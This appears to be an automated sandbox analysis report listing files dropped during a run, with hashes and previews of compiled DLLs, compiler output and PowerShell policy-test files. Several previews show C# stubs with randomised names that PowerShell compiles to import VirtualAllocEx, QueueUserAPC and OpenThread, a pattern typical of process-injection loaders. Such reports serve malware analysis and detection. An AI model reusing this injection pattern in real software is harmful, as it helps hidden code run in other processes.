Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.i.o.4.q.d.n.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.i.o.4.q.d.n.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.087002864921187
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryagCM/qak7YnqqvgCM/bPN5Dlq5J:+RI+ycuZhN8HM/qakSvHM/bPNnqX
MD5:	0715FC9E2573623F149A5EE75C23C19B
SHA1:	2CB92F2B64924BB21D69453A6017780D1F016230
SHA-256:	996161F8FFE0C987715BFBA1A7CB32C4B36800CE92A97CC24BF1797720D827AA
SHA-512:	09F78A6A99B359A78FC673E12A2FED9C99D1CE7ACC0FCE909FC98A5F578153ABB29BA9510BF20DD20C6B6EB3BE011CE17C9CCE2662A91C7B7C057697906B4696
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.i.i.w.3.g.s.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.i.i.w.3.g.s.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.088300623958703
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygYfGak7YnqqhYfXPN5Dlq5J:+RI+ycuZhNuY+akShYfPNnqX
MD5:	45ACEB27BF09B9A372DF76C41EA25CBC
SHA1:	A5F6283D5F24B18AF5F4206A57A442688BCFA221
SHA-256:	BB5D61468F93620A5CA74F3CAD2B6B935CFB41E627AC05505BF5BFD18DDD23EC
SHA-512:	5EE60D2C82347F5761DACE5C8B13919D8D18F57539C2D42C211D91E21AE5F95CB586D22E94C2978CE83C41970714800F68B6E12019A0B6B4D6B4075838F9DBF9
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.b.y.t.p.2.e.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.b.y.t.p.2.e.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1159679552735917
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyak7YnqqgPN5Dlq5J:+RI+ycuZhNUakSgPNnqX
MD5:	B6F8FAC514A8F5183DB815BD950B9D1F
SHA1:	9C5CEE4507522F07CB4BDE73F8DA9AF0418573F7
SHA-256:	3D4151340E53DE7F388B865E8A54A8D9574D29C30C776ED7A345E691A60C6838
SHA-512:	E50EE4A00FB61B00D3A7EA58F550CAB0BCC6066B38781974586B485DB1FB940A468B3FA2A59503AAD90FC863884E9BB1524CDDCDC9CCB657A972109CCC0690DD
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.j.l.j.q.x.u.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.j.l.j.q.x.u.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES9EC1.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	2.6912424772889194
Encrypted:	false
SSDEEP:	24:43bTkhHNFhKdNNI+ycuZhNjuakS6vPNnq9hgpUnW9s:43ngdKd31uljua36tq9Z5
MD5:	B38B49F3A10F7649430F13A4283FAE5F
SHA1:	3EE4FB0BAD3FB1643752BAF1C6B1A425DFBC8EE8
SHA-256:	1F1E88E61F746EAF0AF0B432B619ACE9F1AE1991A74D8D0675C946B005AD98EE
SHA-512:	4580B5BCB69EC48797925D171C6EE8106C7722F837280D010F6DBFD34193FDB8E2BF3140AC74E06A7E3795FDD146CDD20A81094EC9EC6798A624CD4A45F75DF6
Malicious:	false
Reputation:	unknown
Preview:	........J....c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP.................^TYp..L3....1-[..........4.......C:\Users\user\AppData\Local\Temp\RES9EC1.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESB12F.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	2.6914814281046717
Encrypted:	false
SSDEEP:	24:43LghHEhKdNNI+ycuZhN8HM/qakSvHM/bPNnq9hgpGnW9s:43L82Kd31uleMia3vMJq9j5
MD5:	DC6B839F34BBA6D3CB05082BB9F87D49
SHA1:	26A506559EFEE4F82ECF9E17ADC9118433F3363D
SHA-256:	1E3CA6ECAA1C7ECC75DEF865367AF0CB1C8C2A3086E14E09EDBE716C6BE9859D
SHA-512:	6D56FDA4A24300A016A039D006EDB39ADEF3DD286D20F4B7DEDBA1D761935A4C843C5D42431C6E0867B5CC5FAA913BE51112712E523910A8B6FBD1A40F02B7ED
Malicious:	false
Reputation:	unknown
Preview:	........J....c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP.....................%sb?..^.\#............4.......C:\Users\user\AppData\Local\Temp\RESB12F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESB287.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	2.71260515918407
Encrypted:	false
SSDEEP:	24:jAy9ZhHXQhKdNNI+ycuZhNUakSgPNnq9hgpNnW9s:jAIiKd31ulUa34q9i5
MD5:	10BE416BDF4B44C72317119FC15E943B
SHA1:	219915B9631AE2493E7C87CE7BFFD2B85793D9AB
SHA-256:	FCC50836A5C55FB1A052AA25E56A75AF065A056DBA700F6FE8FD81CFFCE2C6AD
SHA-512:	CD98E69BDB55C2FE5C40FBEB7C6A0003776096463F8762EC93BFE2D5EDAED17B88FEA47DB33CA1F7BCC4B17FC158F73202B911814F0651B50E4501E43B0B4F02
Malicious:	false
Reputation:	unknown
Preview:	........K....c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP........................=.................4.......C:\Users\user\AppData\Local\Temp\RESB287.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESC95B.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	2.6881321375655713
Encrypted:	false
SSDEEP:	24:jiCvhHEhhKdNNI+ycuZhNuY+akShYfPNnq9hgpRnW9s:jdpkvKd31ult+a3q9q9+5
MD5:	3B53B806CC04C1B8A2A5209336D02D18
SHA1:	E31FF9610D2E472330F330792EC99A5FF8DAA6C6
SHA-256:	0EC24924884C9D3DA340E5F26F6D16876A632A7A27C26EE8F92F52690BB3A377
SHA-512:	9E07B4871C941C90D9758F5D0D987BB543DEA42313AFF23F77D76EE34639ADC74C77095EFC77CC233967297D9301E0967DC6B96548F605121E9FE4FC6682C3A6
Malicious:	false
Reputation:	unknown
Preview:	........K....c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP................E..'....r.v...\...........4.......C:\Users\user\AppData\Local\Temp\RESC95B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h2althh.jtq.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31fsqk4c.qy5.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5szhzhvw.zcn.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	4.989686390677173
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJZMRSRa+eNMjSSRrIdOLaSRHq1rywQeNVaMny:V/DTLDfuP9eg5rIglurywhNUMny
MD5:	5210AC8610DA2A55F963FF2C951D0DC3
SHA1:	A4F391F9661A57D4A40896F31158BB5E445B4269
SHA-256:	53CE49B3F1728B3ABDCE3ECEBC468947EC3C89460B721456CD7BFD297888F877
SHA-512:	9B02B21D978580967C6812DF158124973A6D1A147EFD2CF842F421FD1A44D8525DFD38270C1F500F7010436F41FC1771C983A59C3C3FFBAA18ED8B072DB18870
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yykg. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint qsg,uint ocyun);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);.. }..}.

C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.224886261087632
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23flVUzxs7+AEszIWXp+N23flP:p37Lvkmb6KH9qWZE89P
MD5:	704312AA80E7E080EFE947DB843E3C91
SHA1:	1B2258967D5728A67A8171DB6FBB7A33C3D6BD8D
SHA-256:	7B76F9EDD919A4F5F405A47347635685736FECBB35ACF9C08DE86434BBE8C675
SHA-512:	DCA51BA33C8ACD6FEF4E6E7F5D742A19D9E4C7DA42102533E1175A4834780900490A1593BF520FB5CD86069F5C2D8F4A153776471F1BBB0AAD91F201024493F2
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ebytp2em.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs"

C:\Users\user\AppData\Local\Temp\ebytp2em.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6114615630922198
Encrypted:	false
SSDEEP:	24:etGSz8+mEej8MTHtmCFxcdWptkZf+lBm0hEdI+ycuZhNuY+akShYfPNnq:6xLjMTwCFxuWkJ446Ed1ult+a3q9q
MD5:	0447C5B78E665D1A2761B0469D0D1E62
SHA1:	29EA6B23A4FA3F7132D75162C50A080D1C57E835
SHA-256:	B2A76D43F563B84066B554A64CAC6CCB0A065CCE55C5563F4945534042DCAFA5
SHA-512:	CAEB0D48B51F0F241097B934B027408C53D4A9CDBC6788F21B4110B28FB7A635DD3C75D7CB628D64FD40533A49496DBC00A9F84BCA50A319AA111EFC805F916B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...................................................... 7............ I............ Q.....P ......`.........f.....j.....p.....\|.....................`.!...`...!.`.&...`.......+.....4.1.....7.......I.......Q....................................... ..........<Module>.ebytp2em.dll.yykg.W32.msco

C:\Users\user\AppData\Local\Temp\ebytp2em.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	415
Entropy (8bit):	5.038565598056225
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ0mMRSR7a18lpP6tkSRa+rVSSRnA/fl81N4IkgsOFQy:V/DTLDfuCMLh6tv9rV5nA/61N43gszy
MD5:	820D67D86E4D2F141C62A2F02F457875
SHA1:	0F597E389BE20591567742E9333D19419947B3CD
SHA-256:	0DECFD511470CAB8EF7D4A45A891B8D3C8A7ABA782190C2777E2A2048F82A3CD
SHA-512:	B05C022573C3EA6D9BC39C6E6E38DD33EC63D55F9793E6F5367E1EBA8493C33FFA28EB5989881EC82EE898F117D616FD1FE2A68E7FBF345209E8A61CBBFCCB61
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class nrahxbk. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);.. }..}.

C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.241901715088777
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fYTzxs7+AEszIWXp+N23fY6x:p37Lvkmb6KHgTWZE8gO
MD5:	69A778C5C4BA5BD5D74607FCA057A349
SHA1:	C40A97992D33C9F9E0A4D7FCD0F2D679C7A03CF8
SHA-256:	44A5FC032575EE6A2B6A2E78B1AAC2A33E587462CF1C3AAE902423ED6930154D
SHA-512:	45804C00134BEC8852E78E4A9E59CBB80D4F1E667CA5D2EC24321FC0D13B13F912DBE017311BB1A79BB260A7B9D8822F9EB2FE998F0AAA2673B17BCB3C113D91
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs"

C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.632611212353435
Encrypted:	false
SSDEEP:	48:6jm65J7+ikL31uu0SJguaqgX1uleMia3vMJq:r65J7yL3PAIkvKv
MD5:	0186F4FD170148B6038818513C1E0433
SHA1:	B00BE66DE2852FB11DD967F554CE2BB3031DE47B
SHA-256:	5F2170918D15A7A7EA12A6AFF2A7138E938C5FB80FC8D18CBC7B5B67F0446B82
SHA-512:	8C97E2B4F7765112905CB26CC284CD09EC9866EBA082069EDBE9ABF17AACD9E25FC90495644CFCF8478838F549AC9A2C0C09A57860B52F9709C0B2B0E15C4B7A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............)...................................... :............ G............ Z.....P ......e.........k.....v...........................e. ...e...!.e.%...e............3.<.....:.......G.......Z.......................................#........<Module>.hiiw3gsl.dll.nrahxbk.W32.mscorlib.

C:\Users\user\AppData\Local\Temp\hiiw3gsl.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	4.989686390677173
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJZMRSRa+eNMjSSRrIdOLaSRHq1rywQeNVaMny:V/DTLDfuP9eg5rIglurywhNUMny
MD5:	5210AC8610DA2A55F963FF2C951D0DC3
SHA1:	A4F391F9661A57D4A40896F31158BB5E445B4269
SHA-256:	53CE49B3F1728B3ABDCE3ECEBC468947EC3C89460B721456CD7BFD297888F877
SHA-512:	9B02B21D978580967C6812DF158124973A6D1A147EFD2CF842F421FD1A44D8525DFD38270C1F500F7010436F41FC1771C983A59C3C3FFBAA18ED8B072DB18870
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yykg. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint qsg,uint ocyun);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);.. }..}.

C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.301069111144844
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fX8Vzxs7+AEszIWXp+N23fX8Qn:p37Lvkmb6KHP8VWZE8P8Q
MD5:	0B98006696980210E9096059C632C9B8
SHA1:	BA33540895DF323BB1D30D55441736656F52DD5A
SHA-256:	3E717303B58E2B14894912390DE05081D1807884B29A6C570C69FE8F34AC8FB0
SHA-512:	986EE52DEF241BA94C9D44E5D1CE8DED5DEF73E1CFB6E02841BF15884B1391CDB7E222F8D4178ECCD224787064F6FCD6DE3ECC96AF33A2D09C66975483A2080A
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hjljqxud.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs"

C:\Users\user\AppData\Local\Temp\hjljqxud.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6196876679200796
Encrypted:	false
SSDEEP:	24:etGSN8+mEej8MTHtmCFxidWptkZfOBvPat60hEdI+ycuZhNUakSgPNnq:6DLjMTwCFxcWkJOlSt66Ed1ulUa34q
MD5:	AB4597E9782631B17D2198E76172A529
SHA1:	F1A1CEB3F77BC49D50D7D19C1BCB735D371F42A4
SHA-256:	4B834FFE906C310F0F47401E4533440FABEE3F0CEC9B9226E8DF0CFAFCC0972A
SHA-512:	A3E2C980FF718E6028215F79235A9C69CBDA0817163F1C98E32F79A6303A28C1A2C434A19F1DB94A5E46D4CC377173D96806A49B728E1C62D2344BB04D9368A6
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...................................................... 7............ I............ Q.....P ......`.........f.....j.....p.....\|.....................`.!...`...!.`.&...`.......+.....4.1.....7.......I.......Q....................................... ..........<Module>.hjljqxud.dll.yykg.W32.msco

C:\Users\user\AppData\Local\Temp\hjljqxud.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
